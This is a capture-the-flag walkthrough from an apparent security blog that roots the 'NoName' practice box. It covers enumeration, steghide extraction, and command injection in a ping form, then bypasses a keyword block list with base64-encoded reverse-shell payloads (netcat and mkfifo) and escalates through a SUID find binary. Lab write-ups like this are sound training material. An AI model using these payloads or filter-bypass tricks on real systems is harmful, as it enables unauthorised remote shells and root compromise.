Muzec's Cyber Security Blog

Hack. Sleep. Repeat

View on GitHub

Enumeration With Nmap

We always start with an nmap scan…..

Nmap -sC -sV -oA nmap <Target-IP>

┌──(muzec㉿Muzec-Security)-[~/Documents/PG/NoName]
└─$ cat nmap.nmap
# Nmap 7.91 scan initiated Sun Jun 20 11:56:14 2021 as: nmap -sC -sV -oA nmap 192.168.197.15
Nmap scan report for 192.168.197.15
Host is up (0.33s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 20 11:57:26 2021 -- 1 IP address (1 host up) scanned in 71.42 seconds

Web Enumeration On Port 80

Since we have only Port 80 open we know our focus is only on HTTP enumeration now let try to access the IP on our browser to see what we have running between it running apache webserver.

image

Just a fake ping form so let try to brute force some directories with Gobuster .

┌──(muzec㉿Muzec-Security)-[~/Documents/PG/NoName]
└─$ gobuster dir -u http://192.168.127.15/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,php,html,bak,sh,pl,cgi,zip
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.127.15/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt,php,html,bak,sh,pl,cgi,zip
[+] Timeout:                 10s
===============================================================
2021/07/28 14:27:53 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 201]
/admin                (Status: 200) [Size: 417]

So we Navigate to that directory http://IP/admin a page with HacLabs directory of gallery.

image

Let try checking the source code.

image

Going through the source code we find the following comment at the last line: <!--passphrase:harder--> now what to do since we have some images let try using staghide on them all with the password.

Steganography

Using steghide with the image haclabs.jpeg and the passphrase we discover a new directory superadmin.php

┌──(muzec㉿Muzec-Security)-[~/Documents/PG/NoName]
└─$ steghide info haclabs.jpeg
"haclabs.jpeg":
  format: jpeg
  capacity: 577.0 Byte
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
  embedded file "imp.txt":
    size: 21.0 Byte
    encrypted: rijndael-128, cbc
    compressed: yes

Extracting

┌──(muzec㉿Muzec-Security)-[~/Documents/PG/NoName]
└─$ steghide extract -sf haclabs.jpeg                                                                                                                              1 ⨯
Enter passphrase: 
the file "imp.txt" does already exist. overwrite ? (y/n) y
wrote extracted data to "imp.txt".

image

Exploitation Command Injection On Ping Form

I was able to execute some command using 127.0.0.1 | id but when i try getting a reverse shell i got nothing so i try reading the superadmin.php code.

127.0.0.1 | cat superadmin.php

image

Source code Below;

<?php
   if (isset($_POST['submitt']))
{
   	$word=array(";","&&","/","bin","&"," &&","ls","nc","dir","pwd");
   	$pinged=$_POST['pinger'];
   	$newStr = str_replace($word, "", $pinged);
   	if(strcmp($pinged, $newStr) == 0)
		{
		    $flag=1;
		}
       else
		{
		   $flag=0;
		}
}

if ($flag==1){
$outer=shell_exec("ping -c 3 $pinged");
echo "<pre>$outer</pre>";
}

We can some of the commands are blocked it keep getting fliter but seems we can bypass it.

Reverse Shell

nc.traditional -e /bin/bash IP Port

OR

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP Port >/tmp/f

I will be trying the two payloads.

image

So we encode it to base64 also let start our ncat listener.

┌──(muzec㉿Muzec-Security)-[~/Documents/PG/NoName]
└─$ sudo nc -nvlp 443
[sudo] password for muzec: 
listening on [any] 443 ...
127.0.0.1 | echo bmMudHJhZGl0aW9uYWwgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNDkuMjA5IDQ0Mw== | base64 -d | bash
┌──(muzec㉿Muzec-Security)-[~/Documents/PG/NoName]
└─$ sudo nc -nvlp 443
[sudo] password for muzec: 
listening on [any] 443 ...
connect to [192.168.49.209] from (UNKNOWN) [192.168.209.15] 57488
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

We have shell cool right now let try the second payload.

127.0.0.1 |  echo cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTkyLjE2OC40OS4yMDkgODAgPi90bXAvZg== | base64 -d | bash

image

We have also shell with it now let spawn a TTY shell and root the box.

python3 -c 'import pty; pty.spawn ("/bin/bash")'

Privilege Escalation

image

sudo -l

We go nothing so let try checking for SUID permission with find / -perm -u=s -type f 2>/dev/null .

www-data@haclabs:/var/www/html$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/lib/snapd/snap-confine   
/usr/lib/openssh/ssh-keysign  
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper               
/usr/lib/policykit-1/polkit-agent-helper-1 
/usr/sbin/pppd                                                                     
/usr/bin/pkexec              
/usr/bin/find              
/usr/bin/gpasswd          
/usr/bin/chfn           
/usr/bin/chsh               
/usr/bin/arping               
/usr/bin/passwd               
/usr/bin/traceroute6.iputils     
/usr/bin/sudo                   
/usr/bin/newgrp                 
/snap/core/8689/bin/mount     
/snap/core/8689/bin/ping                                                           
/snap/core/8689/bin/ping6    

We have find on SUID cool that our way to root.

/usr/bin/find . -exec /bin/sh -p \; -quit

image

We are root and done.

Greeting From Muzec



Back To Home